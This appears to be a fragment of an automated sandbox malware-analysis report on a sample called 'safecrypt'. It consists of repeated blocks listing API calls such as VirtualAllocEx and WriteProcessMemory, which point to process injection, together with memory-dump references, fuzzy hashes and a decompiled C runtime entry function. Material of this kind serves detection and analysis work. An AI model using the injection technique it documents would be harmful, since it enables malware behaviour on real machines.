                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction ID: 37e1df3ec3eb1e572c59e8854095cb13f30abfba968c744b7292236c99648f41
                    • Opcode Fuzzy Hash: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction Fuzzy Hash: 9A413436928512EEFF1E73618C15F3E759ABB83B05F049BDDE00B99182FEA90603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction ID: ba90eadfac0c083118d387847274e922947dfb5628a2b6a0f40ebc1a6a039b30
                    • Opcode Fuzzy Hash: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction Fuzzy Hash: F1413836918512EEFB1F73618C15F3E799ABB83B05F049BDCA00BD5182FEA54603C966
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction ID: d0deb1ec4003a1a2b33057340b02a13a04054a33fe9b81aab83b8bed01a4d377
                    • Opcode Fuzzy Hash: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction Fuzzy Hash: AE413736918512AEFF1E73608C15F3E759ABB83B05F049BDDE00B99182FEB44603C966
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: ad653cdbbe202b6903ff7537959809c2433e5f10a0ccc8f705f12dba73efa9c5
                    • Instruction ID: b61cad75434aa59bb9690e461d233b70d82495cfa1cb2ab55e8d00939afeea7f
                    • Opcode Fuzzy Hash: ad653cdbbe202b6903ff7537959809c2433e5f10a0ccc8f705f12dba73efa9c5
                    • Instruction Fuzzy Hash: 57413432918512AEEF1E77608C15F3D75AABB83B05F449BDDE00B9A0C2FEA44603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 1b53f0610925ea3729fd391b07247f995db752541dc19181e2343a024497bfdc
                    • Instruction ID: fda078f4fbb5a9a7e7c393eb79a9ebc4a5e6183b9c4f59b88aeb7fed04dabba9
                    • Opcode Fuzzy Hash: 1b53f0610925ea3729fd391b07247f995db752541dc19181e2343a024497bfdc
                    • Instruction Fuzzy Hash: 2A312536918512AEEF1E77608C15F3D75AABB83B05F049BDDE00B95182FEB44603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                    				CHAR* _v8;
                    				intOrPtr* _v24;
                    				intOrPtr _v28;
                    				struct _STARTUPINFOA _v96;
                    				int _v100;
                    				char** _v104;
                    				long _v108;
                    				void _v112;
                    				char** _v116;
                    				intOrPtr* _v120;
                    				intOrPtr _v124;
                    				void* _t27;
                    				intOrPtr _t36;
                    				signed int _t38;
                    				long _t40;
                    				intOrPtr* _t41;
                    				intOrPtr _t42;
                    				intOrPtr _t49;
                    				intOrPtr* _t55;
                    				intOrPtr _t58;
                    				intOrPtr _t61;
                    
                    				_push(0xffffffff);
                    				_push(0x470e58);
                    				_push(0x441bcc);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t58;
                    				_v28 = _t58 - 0x68;
                    				_v8 = 0;
                    				__set_app_type(2);
                    				 *0x86efbc =  *0x86efbc | 0xffffffff;
                    				 *0x86efc0 =  *0x86efc0 | 0xffffffff;
                    				 *(__p__fmode()) =  *0x86efa8;
                    				 *(__p__commode()) =  *0x86efa4;
                    				 *0x86efb8 = _adjust_fdiv;
                    				_t27 = E00441BCB( *_adjust_fdiv);
                    				_t61 =  *0x475eb0; // 0x1
                    				if(_t61 == 0) {
                    					__setusermatherr(E00441BC8);
                    				}
                    				E00441BB6(_t27);
                    				_push(0x474014);
                    				_push(0x474010);
                    				L00441BB0();
                    				_v112 =  *0x86efa0;
                    				__getmainargs( &_v100,  &_v116,  &_v104,  *0x86ef9c,  &_v112);
                    				_push(0x47400c);
                    				_push(0x474000); // executed
                    				L00441BB0(); // executed
                    				_t55 =  *_acmdln;
                    				_v120 = _t55;
                    				if( *_t55 != 0x22) {
                    					while( *_t55 > 0x20) {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				} else {
                    					do {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    						_t42 =  *_t55;
                    					} while (_t42 != 0 && _t42 != 0x22);
                    					if( *_t55 == 0x22) {
                    						L6:
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				}
                    				_t36 =  *_t55;
                    				if(_t36 != 0 && _t36 <= 0x20) {
                    					goto L6;
                    				}
                    				_v96.dwFlags = 0;
                    				GetStartupInfoA( &_v96);
                    				if((_v96.dwFlags & 0x00000001) == 0) {
                    					_t38 = 0xa;
                    				} else {
                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                    				}
                    				_t40 = E00441E24(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                    				_v108 = _t40;
                    				ldiv(_t40, ??);
                    				_t41 = _v24;
                    				_t49 =  *((intOrPtr*)( *_t41));
                    				_v124 = _t49;
                    				_push(_t41);
                    				_push(_t49);
                    				L00441BAA();
                    				return _t41;
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.325756086.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.325749384.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.325794672.0000000000442000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.325826185.0000000000474000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.325834815.0000000000475000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.325862733.000000000086F000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_safecrypt.jbxd
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrldiv
                    • String ID:
                    • API String ID: 2844061703-0
                    • Opcode ID: 38d39d22723e807a926b48ef2cdf7980a43b7f3ca95e95afe9c05e5f157759b6
                    • Instruction ID: d391ae85305779653b6cf4a2ccaf8ff45d307429c3a7211341ba76037e11effb
                    • Opcode Fuzzy Hash: 38d39d22723e807a926b48ef2cdf7980a43b7f3ca95e95afe9c05e5f157759b6
                    • Instruction Fuzzy Hash: 0B418675800384DFE720DFA4DD45AAABBB8FB09710F20055FF541972A1EBB45881CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID: U$f
                    • API String ID: 2738559852-3222212738
                    • Opcode ID: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction ID: 308f1fb89a0c436d482d8e331162b6587e85c434b4a3f956ddb829e2dff48304
                    • Opcode Fuzzy Hash: 363cdfcf4f9ed0e7e83d16517b91efe320dc7ba137195d6f91fac9ff9ab5755e
                    • Instruction Fuzzy Hash: 3F510375A146149FDF29AA64CC81B79B6B5FB82304F0496EDD00BEB240DA749E03CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction ID: 8ad274985ee827aacd45b419f9e6f3990474a718dc5b136f203922e26df532a7
                    • Opcode Fuzzy Hash: cbd23944fa6dac052ea3826d733f5c9681578b518551f3281ed63a448b419184
                    • Instruction Fuzzy Hash: 31510175E046149FEF1AEA54CC81BB9B6B1FB86304F0547A8D00FEB240DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID: U$f
                    • API String ID: 2591292051-3222212738
                    • Opcode ID: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction ID: 2720708ed4459e39f373017ac9847f41524f2408a8cefa3e76bc656080bdcd81
                    • Opcode Fuzzy Hash: 1672dd24bb482af518c7ed726df05ca0bd58107dd05941ded8a85d3e04d6d6ed
                    • Instruction Fuzzy Hash: 0351F375E046149FEB1AEA64CC81BBDB6B1FB96304F0556E8D00FEB240DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
                    • Instruction ID: 0ddfbda31d98407bbdd03907b7022c0b63ad7738c84be86681da42766da5e534
                    • Opcode Fuzzy Hash: 532070062cf11b9904d3a9db09fd8773f3dc478adfd5a9ce6003f0dfcfe5d1dd
                    • Instruction Fuzzy Hash: 7451F476E046149FEB19EA54CC81BBDB6B1FB86304F0556E8D00FEB244DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction ID: c69d99242ffc5574ba1304ec17a028d00740450169d642c8b8d7ccc22659f678
                    • Opcode Fuzzy Hash: 4853ab38e3ee6ab3172fa8a93713d0e47700ea2fba302bc6369f40e7867e9981
                    • Instruction Fuzzy Hash: 0541F276E046149FEB29EA54CC81BBDB6B1FB96304F0556A8D00FFB240DA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction ID: be957c4a8b2db7020012dce5195cecc1c1cd58f0f23423c0de0a7165b45cd537
                    • Opcode Fuzzy Hash: d0931d3c0a29b7f7d1ee63a1d07ef245cda2e46c2bbe9825bb633b5d00c70897
                    • Instruction Fuzzy Hash: 2E41E176E446248FDB19EE54CC81BADB6B1FB45304F4546A8C10EFB240CA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                      • Part of subcall function 026815C4: VirtualAlloc.KERNELBASE ref: 02681643
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocChangeCloseFindNotificationVirtual
                    • String ID: U$f
                    • API String ID: 2354611264-3222212738
                    • Opcode ID: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction ID: 971b80ea75538af22df1a4481893eef9398060e712ccd9194cdb76612b532cf4
                    • Opcode Fuzzy Hash: 17b0c341b52739a790c545d3b2fd629092981d63857a88dcb1ee279f33b8d765
                    • Instruction Fuzzy Hash: A941D076E446248FDB19EE68CC81BADB6B1FB45304F0556A9D10EFB240CA74AE47CE41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction ID: 517ee47ae509b7a440cbf16edc0f01a5a218b85a0db8613538068d57f2d20751
                    • Opcode Fuzzy Hash: b820873df2fcea4a6e708b8f9a5522c674a9895d130da8e17574ea9c0984405b
                    • Instruction Fuzzy Hash: 2D517931D2C686EDFB2DB7208C12B793159FB82705F04DB9DE507A9181EE784A0BC912
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction ID: ba1f49a18759e26cb5c659a7d68b440aac49faa93820bee3bb5a00006ccd0dba
                    • Opcode Fuzzy Hash: cb6bd99a343ba0c5f25fd0ccd8ce41c5f4a862fcf58d9a64fa7457bc24e33bc0
                    • Instruction Fuzzy Hash: 9FF02E3066C582ADEB1EB360DC31938348AAB80B09B05DB2DA803D9182EE2889078432
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID: read
                    • API String ID: 621844428-2555855207
                    • Opcode ID: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction ID: 1f3efae241e841c1ed4a08b6b61563367f829834833b53b390bce0ce072c07d8
                    • Opcode Fuzzy Hash: c55a1e3579fd569a3a4676985bf2f89f8d330299d34ffc2bbc19bbe4e4652b72
                    • Instruction Fuzzy Hash: AFF0E57166D582A9BB1E77608C31C39348ABB80B19744DB0DEC03C9182FD3805478836
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: m
                    • API String ID: 0-3775001192
                    • Opcode ID: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction ID: 3e42be39baee66a033e215acebf77d45c1a7efbb23908b79d6853d6fde7494cb
                    • Opcode Fuzzy Hash: 22f51a0c6e4f82a2a73faf25d516c2bad06a7d5efb6946187ae1608bb3eb2431
                    • Instruction Fuzzy Hash: A4513636918501DDEB09FBA08D51B3D7AA6FB91708F05EF1DD003AB152EE75490ECB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction ID: ef04c6af3df162024378536914f448b6731e1ebf0f418d961db9ebc75ac47510
                    • Opcode Fuzzy Hash: 516fedfe359e9bc17fdc314171fedff6de38101870687e966c8db859eec00c60
                    • Instruction Fuzzy Hash: A0515736918601DDEB0DFBA08D41B3D7AAAFB81708F05EF1DD003AB152EE74450ECA52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID: m
                    • API String ID: 2538663250-3775001192
                    • Opcode ID: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction ID: 294a06b7c2f42b2da7d26637a2ecebbb046a3159057700af5dfa924f3afd49a8
                    • Opcode Fuzzy Hash: cd1b1c505157a8ba16f0de916322fb71060366f9898df66083f292515782007f
                    • Instruction Fuzzy Hash: 61413836D18601DDEB09FBA08D41B397AA9FB51708F05EF1ED003AB152EE75450FCA56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction ID: f606bb15005de80758e07364992b85a269a3c0da1830b4d3f4dd10a48b37e180
                    • Opcode Fuzzy Hash: 557cdcc39c23c8639c6a724c4ccfcc95f9922060c4b41ae0de32f6856295eeb9
                    • Instruction Fuzzy Hash: A9316B71A28145AFEF2E77204C51E793A9AFBC3705F0497CDE04BD9142EE340A478D12
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction ID: 48b51f6b9197fdb5464739f1f4d1233fb94cbd13758df2cd20fb84a0cb43e203
                    • Opcode Fuzzy Hash: 2345ff6e8315cfd2208d5671bc11a5bcfb8dafb5c5efe15de6b2c50965d4fb6d
                    • Instruction Fuzzy Hash: E6314665A28546AFEF2E77204C91E797A5EFBC3705F04A7CDE04BD9182EE350A478D02
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction ID: b80c269b4a50219a69a78a719ad4ea614d72bf321454c3c13360aec4afa88531
                    • Opcode Fuzzy Hash: 6bd592971602314f8097fbff9fa399dad12e58fc6d5e572a2e8fff8a3c20566f
                    • Instruction Fuzzy Hash: 73316765928146AFEF2AB7304C91D783A5EEBC3304F04A7CCA04BD4142EE350A47CD42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    • Opcode ID: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction ID: abc1de1712d73a22ba8009459642ca94e70f3e8c8c84822ef3be7305cb5a828e
                    • Opcode Fuzzy Hash: 4888ca9778e5dd17e4a144d2a959001da2cb10f22221b03b64b5fbbbd99a0110
                    • Instruction Fuzzy Hash: 73217676D241159FEF2BBB308C51AB97AAAEBC3705F04A7CD904AD5142EE344B038D42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE ref: 026812B0
                      • Part of subcall function 026812FD: ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocFileReadVirtual
                    • String ID:
                    • API String ID: 237865483-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
